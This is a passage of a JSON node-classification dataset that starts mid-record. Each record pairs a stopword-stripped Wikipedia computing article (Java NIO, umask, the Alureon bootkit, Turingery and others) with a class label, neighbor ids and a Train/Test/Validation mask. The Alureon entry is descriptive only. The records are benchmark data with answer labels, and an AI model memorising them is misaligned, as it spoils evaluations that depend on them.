    "text": "Michael_Meeks_(software_developer):michael meeks software developer michael meeks british software developer primarily known work gnome openoffice.org libreoffice major contributor gnome project long time working infrastructure associated applications particularly corba bonobo nautilus gnome accessibility hired ximian developer nat friedman miguel de icaza mid-2000 continuing novell suse collabora meeks free software hacker contributed lot time decreasing program load time created direct binding hashvals dynsort implementations gnu binutils glibc work focused making openoffice.org fork libreoffice start faster later subsumed -hash-style=gnu linking optimization work iogrind also allows applications profiled optimized first-time 'cold start far rapidly supports libreoffice evolution free software solutions document editing groupware previously worked quantel gaining expertise real time av editing playback achieved high performance focused hardware/software solutions meeks christian says made think moral aspects illegal use non-free software converted finally free software",
    "neighbors": [
      6664,
      1761,
      7450,
      8157
    ],
    "mask": "Test"
  },
  {
    "node_id": 1329,
    "label": 3,
    "text": "Socket_TR4:socket tr4 socket tr4 also known socket sp3r2 land grid array lga cpu socket designed amd supporting zen-based ryzen threadripper desktop processors launched august 10 2017 high-end desktop workstation platforms socket tr4 amd second lga socket consumer product short lived socket 1207 fx physically identical incompatible amd server socket sp3 uses x399 chipset supports total 66 pci express lanes quad sli/crossfire setups pci express ×16 slots usually set x399 motherboards like slot 1 — ×16 slot 2 — ×8 slot 3 — ×16 slot 4 — ×8 slots 2 4 usually share bandwidth m.2 slots occupied pci express ×8 slots change x4 speeds m.2 slots occupied",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      3464,
      4872,
      7058,
      10260,
      4767,
      2463,
      7712,
      9122,
      5541,
      1322,
      11183,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      2764,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1651
    ],
    "mask": "None"
  },
  {
    "node_id": 1330,
    "label": 4,
    "text": "Commission_on_Enhancing_National_Cybersecurity:commission enhancing national cybersecurity president commission enhancing national cybersecurity presidential commission formed april 13 2016 develop plan protecting cyberspace america economic reliance commission released final report december 2016 report made recommendations regarding intertwining roles military government administration private sector providing cyber security chairman donilon said report coverage unusual breadth issues deals report made sixteen major recommendations fifty-three specific action items broadly grouped six areas commission found strong authentication systems mandatory adequate cybersecurity government commercial systems private individuals commission also stressed remote identity proofing security internet things iot finding technicians know cybersecurity protect systems short supply commission recommended nationally supported training programs produce adequate workforce well increasing level expertise existing workforce commission highlighted importance partnerships government private sector powerful tool encouraging technology policies practices need secure grow digital economy page 2 criticised commission work lacking understanding cybersecurity cognizant cyber reality cost action items others found report constructive meaningful initial members commission incoming president trump indicated wants full review u.s. cyber protection policy",
    "neighbors": [
      2558,
      7759
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1331,
    "label": 4,
    "text": "Hackers_Wanted:hackers wanted hackers wanted unreleased american documentary film directed written sam bozzo film explores origins nature hackers hacking following adventures adrian lamo contrasting story controversial figures throughout history film narrated kevin spacey originally named hack 2007 film failed get conventional release according lamo conflicts producer others team commonly cited reason problem quality finished product may 20 2010 version film leaked bittorrent lamo stated involvement leak june 12 2010 director cut version film also leaked onto torrent sites version film contains additional footage significantly different one previously leaked",
    "neighbors": [
      4956,
      6773
    ],
    "mask": "None"
  },
  {
    "node_id": 1332,
    "label": 9,
    "text": "Non-blocking_I/O_(Java):non-blocking i/o java java.nio nio stands non-blocking i/o collection java programming language apis offer features intensive i/o operations introduced j2se 1.4 release java sun microsystems complement existing standard i/o nio developed java community process jsr 51 extension nio offers new file system api called nio.2 released java se 7 dolphin apis nio designed provide access low-level i/o operations modern operating systems although apis relatively high-level intent facilitate implementation directly use efficient operations underlying platform java nio apis provided package subpackages documentation oracle identifies features nio data transfer based buffers related classes classes represent contiguous extent memory together small number data transfer operations although theoretically general-purpose data structures implementation may select memory alignment paging characteristics otherwise accessible java typically would used allow buffer contents occupy physical memory used underlying operating system native i/o operations thus allowing direct transfer mechanism eliminating need additional copying operating systems provided particular area memory right properties transfer take place without using cpu nio buffer intentionally limited features order support goals buffer classes java primitive types except codice_2 share memory byte buffers allow arbitrary interpretation underlying bytes nio buffers maintain several pointers dictate function accessor methods nio buffer implementation contains rich set methods modifying pointers channels classes implementing interface designed provide bulk data transfers nio buffers low-level data transfer mechanism exists parallel classes higher-level i/o library packages channel implementation obtained high-level data transfer class vice versa channels analogous file descriptors found unix-like operating systems file channels use arbitrary buffers also establish buffer directly mapped file contents using memory-mapped file also interact file system locks similarly socket channels allow data transfer sockets nio buffers codice_20 used file copy potentially far efficient using old read/write byte array typical code selector subclasses provides mechanism waiting channels recognizing one become available data transfer number channels registered selector enables blocking program flow least one channel ready use interruption condition occurs although multiplexing behavior could implemented threads selector provide significantly efficient implementation using lower-level operating system constructs posix-compliant operating system example would direct representations concepts select notable application design would common paradigm server software involves simultaneously waiting responses number sessions java character set mapping unicode characters subset bytes package nio provides facilities identifying character sets providing encoding decoding algorithms new mappings unexpected channel associated java io randomaccess file closes file descriptor interrupt whereas randomaccessfiles read method jdk 7 includes package class also new jdk 7 among features provides extended capabilities filesystem tasks e.g work symbolic/hard links dump big directory listings buffers quickly old file class package related package provide comprehensive support file i/o accessing file system zip file system provider also available jdk 7",
    "neighbors": [
      2432,
      4960,
      9665,
      9762,
      8582,
      3562,
      5677,
      7983,
      7728,
      5969,
      2994,
      1844,
      5815,
      7802,
      6813
    ],
    "mask": "None"
  },
  {
    "node_id": 1333,
    "label": 9,
    "text": "ISWIM:iswim iswim abstract computer programming language family programming languages devised peter j. landin first described article next 700 programming languages published communications acm 1966 acronym stands see mean although implemented proved influential development programming languages especially functional programming languages sasl miranda ml haskell successors dataflow programming languages like lucid iswim imperative language functional core consisting syntactic sugaring lambda calculus added mutable variables assignment powerful control mechanism program point operator based lambda calculus iswim higher order functions lexically scoped variables operational semantics iswim defined using landin secd machine use call-by-value eager evaluation goal iswim look like mathematical notation landin abandoned algol semicolons statements codice_1 blocks replaced off-side rule scoping based indentation notationally distinctive feature iswim use “ ” clauses iswim program single expression qualified “ ” clauses auxiliary definitions including equations among variables conditional expressions function definitions along cpl iswim one first programming languages use “ ” clauses notable semantic feature ability define new data types possibly recursive sum products – done using somewhat verbose natural language style description apart notation amounts exactly algebraic data types found modern functional languages iswim variables explicit type declarations seems likely although explicitly stated 1966 paper landin intended language dynamically typed like lisp unlike algol also possible mind develop form type inference direct implementation iswim attempted art evan pal john c. reynolds gedanken captured landin concepts including powerful transfer-of-control operations dynamically typed milner ml may considered equivalent without j operator type inference another line descent iswim strip imperative features assignment j operator leaving purely functional language becomes possible switch lazy evaluation path led programming languages sasl krc kent recursive calculator hope miranda haskell clean",
    "neighbors": [
      512,
      9345,
      10246,
      6536,
      5651,
      1947,
      6306,
      10403,
      3876,
      10435,
      3910,
      8262,
      1610,
      5585,
      10581,
      9047,
      7386,
      7259,
      10083,
      6502,
      5623,
      10618
    ],
    "mask": "Test"
  },
  {
    "node_id": 1334,
    "label": 2,
    "text": "Delegated_administration:delegated administration computing delegated administration delegation control describes decentralization role-based-access-control systems many enterprises use centralized model access control large organizations model scales poorly teams become burdened menial role-change requests requests — often used hire fire role-change events occur organization — incur high latency times suffer weak security practices delegation involves assigning person group specific administrative permissions organizational unit information management used create teams perform specific limited tasks changing information within user directory database goal delegation create groups minimum permissions grant ability carry authorized tasks granting extraneous/superfluous permissions would create abilities beyond authorized scope work one best practice enterprise role management entails use ldap groups delegated administration refers decentralized model role group management model application process owner creates manages delegates management roles centralized team simply operates service directory metadirectory web interface administration related components allowing application business process owner create manage delegate groups supports much scalable approach administration access rights metadirectory environment roles groups could also pushed synchronized platforms example groups synchronized native operating systems microsoft windows use access control list protects folder file metadirectory distributing groups central directory central repository groups enterprise applications e.g. peoplesoft support ldap groups inherently applications capable using ldap call directory authorization activities web-based group management tools — used delegated administration — therefore provide following capabilities using directory group repository microsoft active directory administrative permissions accomplished using delegation control wizard types permissions include managing viewing user accounts managing groups managing group policy links generating resultant set policy managing viewing inorgperson accounts use delegation control could give managers complete control users department arrangement managers create new users groups computer objects ou",
    "neighbors": [
      929,
      3521,
      6797,
      3086,
      2737,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 1335,
    "label": 2,
    "text": "Ken_Arnold:ken arnold kenneth cutts richard cabot arnold born 1958 american computer programmer well known one developers 1980s dungeon-crawling video game rogue contributions original berkeley bsd distribution unix books articles c c++ e.g 1980s–1990s unix review column c advisor high-profile work java platform arnold attended university california berkeley worked lawrence berkeley national laboratory computer labs year receiving a.b computer science 1985 berkeley president berkeley computer club computer science undergraduates association made many contributions 2bsd 4bsd berkeley unix distributions including additionally arnold served member student senate president arnold part hewlett-packard team designed corba also worked apollo computer molecular graphics programmer computer graphics lab u.c san francisco member unix review software review board arnold worked senior engineer sun microsystems laboratories areas object-oriented design implementation c c++ java distributed computing one architects jini technology main implementer sun javaspaces technology implemented tuple spaces java platform worked jim waldo remote method invocation object serialization",
    "neighbors": [
      7872,
      577,
      9665,
      1316,
      5384,
      9067,
      5677,
      50,
      5492,
      2045,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 1336,
    "label": 6,
    "text": "Umask:umask computing umask command determines settings mask controls file permissions set newly created files may also affects file permissions changed explicitly umask may also refer function sets mask may refer mask formally known file mode creation mask mask grouping bits restricts corresponding permission set newly created files bits mask may changed invoking umask command unix-like systems file set attributes control read write execute program creates file file permissions restricted mask mask bit set 1 corresponding initial file permission disabled bit set 0 mask means corresponding permission determined program file system words mask acts last-stage filter strips away permissions file created bit set 1 strips away corresponding permission permissions may changed later users programs using chmod program technically called process mask able change settings using function call process shell mask set umask command shell process launches new process child process inherits mask parent process generally mask affects file permissions creation new files effect file permissions changed existing files however chmod command check mask chmod options specified using symbolic mode reference class users specified mask stored group bits may represented binary octal symbolic notation umask command allows mask set octal e.g 0754 symbolic e.g u= g=w o=wx notation umask command used unix-like operating systems umask function defined posix.1 specification mask umask command umask function part original implementation unix operating system evolved relatively small computer-center environment security issue eventually grew serve hundreds users different organizations first developers made creation modes key files restrictive especially cases actual security breaches general solution mask umask command introduced around 1978 seventh edition operating system could allow sites groups individuals choose defaults mask since implemented contemporary implementations unix-like operating systems shell mask set using umask command syntax command umask command invoked without arguments display current mask output either octal symbolic notation depending os shells csh -s argument i.e umask -s force umask display using symbolic notation example umask command invoked octal argument directly set bits mask argument fewer 4 digits entered leading zeros assumed error result argument valid octal number 4 digits three rightmost octal digits address owner group user classes respectively fourth digit present leftmost high-order digit addresses three additional attributes setuid bit setgid bit sticky bit umask invoked using symbolic notation modify set flags specified maskexpression syntax note syntax work using csh due different behaviour built-in umask command multiple maskexpressions separated commas space terminates maskexpression example prohibit write permission set user rest flags mask unchanged example multiple changes would set mask would examples using umask command change mask example showing effect umask mask applied whenever file created mask bit set 1 means corresponding file permission always disabled files subsequently created bit set 0 mask means corresponding permission determined requesting process os files subsequently created words mask acts last-stage filter strips away permissions file created bit set 1 strips away corresponding permission file truth table masking logic bit requesting process file permission mode operated mask using logic yield permission mode applied file created p bit requested file permission mode process creating file q bit mask r resulting bit created file permission mode programmatically mask applied os first negating complementing mask performing logical requested file mode probably first unix manual describe function manual says boolean logic application mask represented c p ~q says file permission mode c result logical operation negation mask q process requested permission mode setting p note many operating systems allow file created execute permissions environments newly created files always execute permission disabled users mask generally applied functions create new file however exceptions example using unix gnu versions chmod set permissions file symbolic notation used user specified mask applied requested permissions applied file example process mask applied whenever process creates new file shell process spawns new process child process inherits mask parent process process shell mask changed umask command processes process launched shell inherits shell mask linux kernel fat hfs hpfs ntfs udf file system drivers support umask mount option controls disk information mapped permissions per-process umask described although permissions calculated similar way file system drivers also support separate umasks files directories using mount options fmask",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      11663,
      4369,
      5397,
      2198,
      6812,
      7196,
      7325,
      4001,
      6138,
      9762,
      2599,
      7847,
      4907,
      8236,
      4398,
      7983,
      8504,
      7356,
      451,
      1987,
      965,
      2245,
      4423,
      8517,
      9542,
      5706,
      3659,
      8522,
      1741,
      1109,
      10967,
      9946,
      4320,
      8675,
      9444,
      1509,
      10087,
      6120,
      10727,
      491,
      8954,
      11249,
      4850,
      5106,
      5492,
      7540,
      8306,
      8692,
      9204,
      10484,
      506,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 1337,
    "label": 4,
    "text": "Alureon:alureon alureon also known tdss tdl-4 trojan bootkit created steal data intercepting system network traffic searching banking usernames passwords credit card data paypal information social security numbers sensitive user data following series customer complaints microsoft determined alureon caused wave bsods 32-bit microsoft windows systems update ms10-015 triggered crashes breaking assumptions made malware author according research conducted microsoft alureon second active botnet second quarter 2010 allure boot first identified around 2007 personal computers usually infected users manually download install trojan software alureon known bundled rogue security software security essentials 2010 dropper executed first hijacks print spooler service spoolsv.exe update master boot record execute modified bootstrap routine infects low-level system drivers responsible pata operations atapi.sys implement rootkit installed alureon manipulates windows registry block access windows task manager windows update desktop also attempts disable anti-virus software alureon also known redirect search engines commit click fraud google taken steps mitigate users scanning malicious activity warning users case positive detection malware drew considerable public attention software bug code caused 32-bit windows systems crash upon installation security update ms10-015 malware using hard-coded memory address kernel changed installation hotfix microsoft subsequently modified hotfix prevent installation alureon infection present malware author also fixed bug code november 2010 press reported rootkit evolved point able bypass mandatory kernel-mode driver signing requirement 64-bit editions windows 7 subverting master boot record made particularly resistant systems detection removal anti-virus software tdl-4 sometimes used synonymously alureon also name rootkit runs botnet first appeared 2008 tdl-1 detected kaspersky lab april 2008 later version two appeared known tdl-2 early 2009 time tdl-2 became known emerged version three titled tdl-3 lead eventually tdl-4 often noted journalists indestructible 2011 although removable tools kaspersky tdsskiller infects master boot record target machine making harder detect remove major advancements include encrypting communications decentralized controls using kad network well deleting malware rootkit generally able avoid detection circumstantial evidence infection may found examination network traffic packet analyzer inspection outbound connections tool netstat although existing security software computer occasionally report rootkit often goes undetected may useful perform offline scan infected system booting alternative operating system winpe malware attempt prevent security software updating fixmbr command windows recovery console manual replacement atapi.sys could possibly required disable rootkit functionality anti-virus tools able find clean infection various companies created standalone tools attempt remove alureon two popular tools microsoft windows defender offline kaspersky tdsskiller november 9 2011 united states attorney southern district new york announced charges six estonian nationals arrested estonian authorities one russian national conjunction operation ghost click february 6 2012 two individuals extradited new york running sophisticated operation used alureon infect millions computers",
    "neighbors": [
      1024,
      10756,
      535,
      9761,
      4644,
      4133,
      10297,
      9791,
      4165,
      1608,
      3657,
      8779,
      7251,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      9910,
      10952,
      3789,
      4304,
      3283,
      4314,
      9435,
      3807,
      9440,
      5349,
      1254,
      10477,
      9460,
      2815,
      3843,
      10502,
      4883,
      10003,
      3867,
      2857,
      8489,
      11052,
      9518,
      11583,
      11584,
      6484,
      857,
      1882,
      7515,
      4462,
      3956,
      9082,
      1417,
      11152,
      10132,
      9630,
      1440,
      5024,
      11175,
      5547,
      1970,
      441,
      1979,
      4027,
      2508,
      4054,
      8664,
      1504,
      9186,
      9709,
      2542,
      507
    ],
    "mask": "Train"
  },
  {
    "node_id": 1338,
    "label": 3,
    "text": "John_Couleur:john couleur john francis couleur july 7 1925 chicago – august 25 2007 scottsdale arizona american computer engineer executive recipient 40 patents world war ii couleur enrolled v-12 navy college training program graduated summa cum laude southern methodist university houston texas 1946 korean war served lieutenant united states air force couleur joined general electric company 1953 ge heavy military electronics department hmed syracuse new york served lead architect development mistram tracking system atlas missile later ge responsible development ge-635 computer system request mit project mac couleur ted glaser designed modifications turn 635 system became ge-645 multics operating system 1972",
    "neighbors": [
      6772
    ],
    "mask": "Test"
  },
  {
    "node_id": 1339,
    "label": 3,
    "text": "BeIA:beia beia beos internet appliances minimized version inc. beos operating system embedded systems beia system presents browser-based interface user browser based opera 4.0 code base named wagner unlike beos runs tracker deskbar boot-up beia os boots straight opera browser interface much like later google chrome os possible boot beia interface similar standard beos involves special knowledge beia operating system employs number techniques minimise system footprint involve number pre processes yield installable file system image cfs filesystem used reduce file system size cfs compressed file system file system created house inc aimed compress files within save space filesystem similar set properties native beos file system bfs advanced features live queries attributes either broken non-functional many beta releases software beos uses elf format executable files much many operating systems beia uses extended version elf name unknown come known celf cel magic word within executable header fact derived elf format executables compression process celf compressed elf files use patented technique compress op codes within executable reduce overall footprint executable file file compressed creating set dictionaries contain op codes read kernel start mapped executable memory run time makes file fast loading extreme disadvantage dictionary extendible user adding extra executable possible using celf compression techniques unless executable symbols existed within dictionary already present creation celf executables generally done batch entire system compressed file system image created crushed files crushing term coined compression system using celf format beia run either celf elf based however use one file formats following beia versions released developers stages development system beia believed many partially responsible death inc. sales never anywhere near high anticipated 2001 zanussi internet fridge toured us beia powered dt-300 webpad docked door",
    "neighbors": [
      2179,
      5380,
      11118,
      3631,
      3312,
      7057,
      370,
      5363,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 1340,
    "label": 2,
    "text": "Motorsport_Manager:motorsport manager motorsport manager racing management-simulation strategy video game developed british video game developer playsport games game released ios august 2014 android 2015 desktop version game published sega macos microsoft windows linux operating systems november 2016 game received regular updates patches including downloadable content pc versions since release latest iteration game pc version released 1 november 2017 player begin later option continue career places control motorsport racing team starting new career user customise team name colour selecting racing series enter four tiers racing series successive tier unlocked winning respective racing series per tier game features hints tips tutorial system represented sprite textbox written character moustached man named nigel homage former british racing car driver nigel mansell provides first-time advice throughout game user also ability invest young driver development programme appointing head engineers drivers improving team headquarters well developing car get edge competition vary quality depending investment level cash required investment things acquired signing sponsorship deals completing challenges appointed sponsors earn bonus payments may vary quality difficulty quantity contract duration depending success popularity user racing team secondary method earning money end racing season based team championship scores game also includes random events system may provide choices player compromise player popularity manager one group sake another may provide optional upgrade choices three research segments game cost cash manufacturing determines car reliability tyre wear design generally affects aspects car aerodynamics affects car downforce acceleration trigger time end racing season user choices behind-the-scenes ultimately affect team racing performances pivotal success game serves main gameplay element motorsport manager dozen race tracks featured in-game share likeness real-life counterparts split respective racing series game track used racing series roster split two parts one-time qualifying session final race team qualifying performance determines starting positions final race challenges set sponsors may offer player considerable sum cash achieve set position leaderboards prove useful apply changes team order give better chance success race day exclusive mobile version micro-transactions supply customers set amounts cash also accelerate rate team improve reducing time challenge required develop fully-fledged racing team game largely similar mobile version game player option either create racing team additional option join fictional motorsport racing team motorsport manager originally released mobile ios 21 august 2014 following considerable success critically commercially upon release game released android 2015 subsequent macos microsoft windows linux desktop versions published sega following financial backing developer playsport games released 9 november 2016 23 november 2016 respectively desktop versions game significantly expanded upon gameplay mechanics mobile version alleviating previous hardware constraints put forward mobile devices allowed in-depth gameplay experience enhanced graphical fidelity relative mobile versions game ios version motorsport manager received positive reviews critics j. d. cohen toucharcade awarded game score 4.5 5 writing ’ never overwhelming light maintain interest motorsport manager finds nice spot complexity spectrum wherein requires frequent decision-making without ever inducing paralysis presenting many options simultaneously pocket gamer harry slater writes ice cold nature motorsport manager one second flying high first place next tyres fail slip back fifth cursing ... things get little repetitive huge game work way gets claws unlikely let go good long motorsport manager manages walk line number-juggling sims softer end spectrum creates strategy game almost anyone crack website awarded score 9/10 game sold 1.6 million copies ios android websites early-tested game gave positive reviews may 2016 pc gamer sean clever wrote ’ niche subgenre one ’ expect see outside fia licence seems like decent first effort put racing management games back grid august 2016 ign luke reilly stated ’ incredibly nuanced experience ’ initially rather intimidating motorsport manager successfully got tentacles around several sessions early version game ... also like pressure race day genuinely stressful situations arise game received positive reviews also release eurogamer.net martin robinson reports lack ability save copy racing set-ups writes approachable veneer disguises otherwise complex sometimes cruel little often abstruse experience managing strategies two cars micromanaging driver boot prove taxing task satisfying execute perfect strategy n't quite enough tools disposal balance frustration often accompanies raceday feedback 're given drivers little obscure ability read lap times deltas little sparse make chasing perfect set-up anything dark art ... motorsport manager couple tweaks away greatness far disappointment gamestar benjamin danneberg says motorsport manager hardcore management game put every screw correctly instead game healthy way strategy fun motorsport.com valentin khorounzhiy writes motorsport manager great game merit roaring success subgenre seems waking long hiatus price tag may seem steep got enough content variety justify ... potential improvement yes playsport done admirable job first installment – hopefully move enough copies justify many many follow-ups james swinbanks pc powerplay writes always something going behind scenes motorsport manager always adds experience never felt cheated even things ’ go way ... ’ perfect setup quirks like increasing rear wing angle adding understeer ’ make sense scratching head trying work might design way grand scheme things motorsport manager want puts pit wall thick website gave score 8/10 sequel mobile version motorsport manager released positive reception 13 july 2017 motorsport manager mobile 2 praised technical first game providing many settings choose compared original mobile version main additions original aside enhancements graphical fidelity include ability player control individual car part design engine modes extra tyre compounds downforce options expanded sponsorship system",
    "neighbors": [
      9957,
      6797,
      7983,
      3348,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1341,
    "label": 1,
    "text": "Probabilistic_database:probabilistic database real databases contain data whose correctness uncertain order work data need quantify integrity data achieved using probabilistic databases probabilistic database uncertain database possible worlds associated probabilities probabilistic database management systems currently active area research currently commercial probabilistic database systems several research prototypes exist ... probabilistic databases distinguish logical data model physical representation data much like relational databases ansi-sparc architecture probabilistic databases even crucial since databases represent large numbers possible worlds often exponential size one world classical database succinctly probabilistic database data item←relation tuple value attribute take—is associated probability ∈ 0,1 0 representing data certainly incorrect 1 representing certainly correct probabilistic database could exist multiple states example uncertain existence tuple database database could two different states respect tuple—the first state contains tuple second one similarly attribute take one values x z database three different states respect attribute states called possible world consider following database actual state database may may contain first tuple depending whether correct similarly value attribute b may b3 b3′ b3′′ consequently possible worlds corresponding database follows essentially two kinds uncertainties could exist probabilistic database described table assigning values random variables associated data items represent different possible worlds",
    "neighbors": [
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      4376,
      2456,
      5658,
      5403,
      1049,
      9631,
      9634,
      4263,
      2344,
      7080,
      10286,
      9397,
      3004,
      6844,
      10048,
      2369,
      5953,
      9286,
      2901,
      10326,
      987,
      2780,
      4065,
      9828,
      10471,
      6124,
      2669,
      6383,
      2544,
      10737,
      9075,
      1146
    ],
    "mask": "Test"
  },
  {
    "node_id": 1342,
    "label": 4,
    "text": "Turingery:turingery turingery turing method playfully dubbed turingismus peter ericsson peter hilton donald michie hand codebreaking method devised july 1942 mathematician cryptanalyst alan turing british government code cypher school bletchley park world war ii use cryptanalysis lorenz cipher produced sz40 sz42 teleprinter rotor stream cipher machines one germans geheimschreiber secret writer machines british codenamed non-morse traffic fish machine tunny reading tunny message required firstly logical structure system known secondly periodically changed pattern active cams wheels derived thirdly starting positions scrambler wheels message—the message key—was established logical structure tunny worked william tutte colleagues several months ending january 1942 deriving message key called setting bletchley park derivation cam patterns—which known wheel breaking —that target turingery german operator errors transmitting one message key producing depth allowed derivation key turingery applied key stream derive cam settings logical functioning tunny system worked well bletchley park cryptanalysts saw one machines—which happened 1945 shortly allied victory europe sz machines 12-wheel rotor cipher machines implemented vernam stream cipher attached in-line standard lorenz teleprinters message characters encoded 5-bit international telegraphy alphabet 2 ita2 output ciphertext characters generated combining pseudorandom character-by-character key stream input characters using exclusive xor function symbolised ⊕ similarly deciphering ciphertext combined key give plaintext produces essential reciprocity allow machine settings used enciphering deciphering five bits key character generated relevant wheels two parts machine termed chi formula_1 wheels psi formula_2 wheels chi wheels moved one position character psi wheels also moved together character movement controlled two mu formula_3 motor wheels key stream generated sz machines thus chi component psi component combined together xor function key combined plaintext enciphering—or ciphertext deciphering—can represented follows symbolically twelve wheels series cams pins around cams could set raised lowered position raised position generated mark x 1 binary lowered position generated space • 0 binary number cams wheel equalled number impulses needed cause complete full rotation numbers co-prime giving longest possible time pattern repeated total 501 cams equals 2 approximately 10 astronomically large number however five impulses considered independently numbers much manageable product rotation period pair chi wheels gives numbers 41×31=1271 26×23=598 cryptanalysis often involves finding patterns sort provide way eliminating range key possibilities bletchley park xor combination values two adjacent letters key ciphertext called difference symbolised greek letter delta δ xor modulo 2 subtraction without borrow —and incidentally modulo 2 addition without carry characters key k difference δk obtained follows underline indicates succeeding character relationship amongst applies differenced example well case plaintext represented p cipertext z following also hold true reason differencing provided way tunny although frequency distribution characters ciphertext could distinguished random stream true version ciphertext chi element key removed plaintext contained repeated character psi wheels move differenced psi character δformula_2 would null character ••••• 00000 bletchley park terminology '/ xor-ed character null character effect circumstances δformula_1 δk repeated characters plaintext frequent characteristics german ee tt ss relatively common telegraphists frequently repeated figures-shift letters-shift characters loss ordinary telegraph message could lead gibberish quote general report tunny turingery introduced principle key differenced one called δκ could yield information unobtainable ordinary key δ principle fundamental basis nearly statistical methods wheel-breaking setting well applying differencing full 5-bit characters ita2 code also applied individual impulses bits first impulse enciphered wheels formula_1 formula_2 differenced one second impulse also worth noting periodicity chi psi wheels impulse 41 43 respectively first one reflected pattern δk however given psi wheels advance every input character chi wheels simply repetition pattern every 41 × 43 1763 characters δk complex sequence july 1942 turing spent weeks research section become interested problem breaking tunny keys obtained depths july developed method deriving cam settings length key involved iterative almost trial-and-error process relied fact differenced psi character null character ••••• 00000 xor-ing character change thus delta key character gives character five chi wheels i.e δformula_1 δk given delta psi character null character half time average assumption δk δformula_1 50 chance correct process started treating particular δk character δformula_1 position resulting putative bit pattern x • chi wheel recorded sheet paper contained many columns characters key five rows representing five impulses δformula_1 given knowledge tutte work periodicity wheels allowed propagation values appropriate positions rest key set five sheets one chi wheels also prepared contained set columns corresponding number cams appropriate chi wheel referred 'cage formula_1 cage 29 columns successive 'guesses δformula_1 values produced putative cam state values might either agree disagree previous assumptions count agreements disagreements made sheets disagreements substantially outweighed agreements assumption made δformula_2 character null character relevant assumption discounted progressively cam settings chi wheels deduced psi motor wheel cam settings experience method developed improvements made allowed used much shorter lengths key original 500 characters",
    "neighbors": [
      1941,
      8318
    ],
    "mask": "Test"
  },
  {
    "node_id": 1343,
    "label": 9,
    "text": "Declaration_(computer_programming):declaration computer programming computer programming declaration language construct specifies properties identifier declares word identifier means declarations commonly used functions variables constants classes also used entities enumerations type definitions beyond name identifier kind entity function variable etc declarations typically specify data type variables constants type signature functions types may also include dimensions arrays declaration used announce existence entity compiler important strongly typed languages require functions variables constants types specified declaration use used forward declaration term declaration frequently contrasted term definition meaning usage varies significantly languages see declarations particularly prominent languages algol tradition including bcpl family prominently c c++ also pascal java uses term declaration though java separate declarations definitions basic dichotomy whether declaration contains definition example whether declaration constant variable specifies value constant respectively initial value variable type similarly whether declaration function specifies body implementation function type signature languages make distinction many languages declarations always include definition may referred either declarations definitions depending language however concepts distinguished languages require declaration use forward declarations used languages interface implementation separated interface contains declarations implementation contains definitions informal usage declaration refers pure declaration types value body definition refers declaration includes value body however formal usage language specifications declaration includes senses finer distinctions language c c++ declaration function include body called function prototype declaration function include body called function definition contrast java declarations always include body word definition technical meaning java c-family programming languages declarations often collected header files included source files reference use declarations n't access definition information header file provides interface code uses declaration defines form information hiding declaration often used order access functions variables defined different source files library mismatch definition type declaration type generates compiler error variables definitions assign values area memory reserved declaration phase functions definitions supply function body variable function may declared many times typically defined c++ known one definition rule odr dynamic languages javascript python generally allow functions redefined re-bound function variable much like name value definition examples declarations definitions c examples declarations definitions c programming languages implicit declaration provided first time variable encountered compile time languages usage considered error may resulting diagnostic message languages started implicit declaration behavior matured provided option disable e.g perl codice_1 visual basic codice_2",
    "neighbors": [
      512,
      3462,
      263,
      8582,
      9482,
      10510,
      655,
      10011,
      9245,
      10013,
      1952,
      10145,
      5677,
      1349,
      8262,
      8524,
      6349,
      847,
      3414,
      2519,
      7398,
      8554,
      9454,
      7026,
      2804,
      380,
      6906,
      2556,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1344,
    "label": 4,
    "text": "DREAD_(risk_assessment_model):dread risk assessment model dread part system risk-assessing computer security threats previously used microsoft although currently used openstack corporations abandoned creators provides mnemonic risk rating security threats using five categories categories dread name comes initials five categories listed initially proposed threat modeling discovered ratings consistent subject debate use microsoft 2008 given threat assessed using dread category given rating 1 10.the sum ratings given issue used prioritize among different issues security experts feel including discoverability element last rewards security obscurity organizations either moved dread-d dread minus scale omits discoverability always assume discoverability maximum rating",
    "neighbors": [
      483,
      612,
      10442,
      1453,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1345,
    "label": 3,
    "text": "Badlands_(1984_video_game):badlands 1984 video game game plot remarkably darker games time player assumes role buck hardworking family man whose wife children murdered band outlaws one one revenge buck tracks various outlaws earning higher higher bounties progresses final foe outlaw leader landolf outlaws ranked order bounties follows despite game apparent old west setting storyline sent hero buck noticeably non-realistic settings example one point buck walks cave ends prehistoric jungle populated dinosaurs also game provided buck three lives lost lives player would see limp humorously crutches humorously carried away stretcher — noticeable break game otherwise dark mature themes player lost his/her last life buck would turn super deformed angel time game text would appear addition game miss sequences occur player loses life humorous well including limited scorpion giving buck mohawk buck cut half axe end buck could kill landolph henches player would see ride sunset badlands earned rarity rank 16 according video game preservation society means existing arcade cabinets game fairly uncommon",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1346,
    "label": 2,
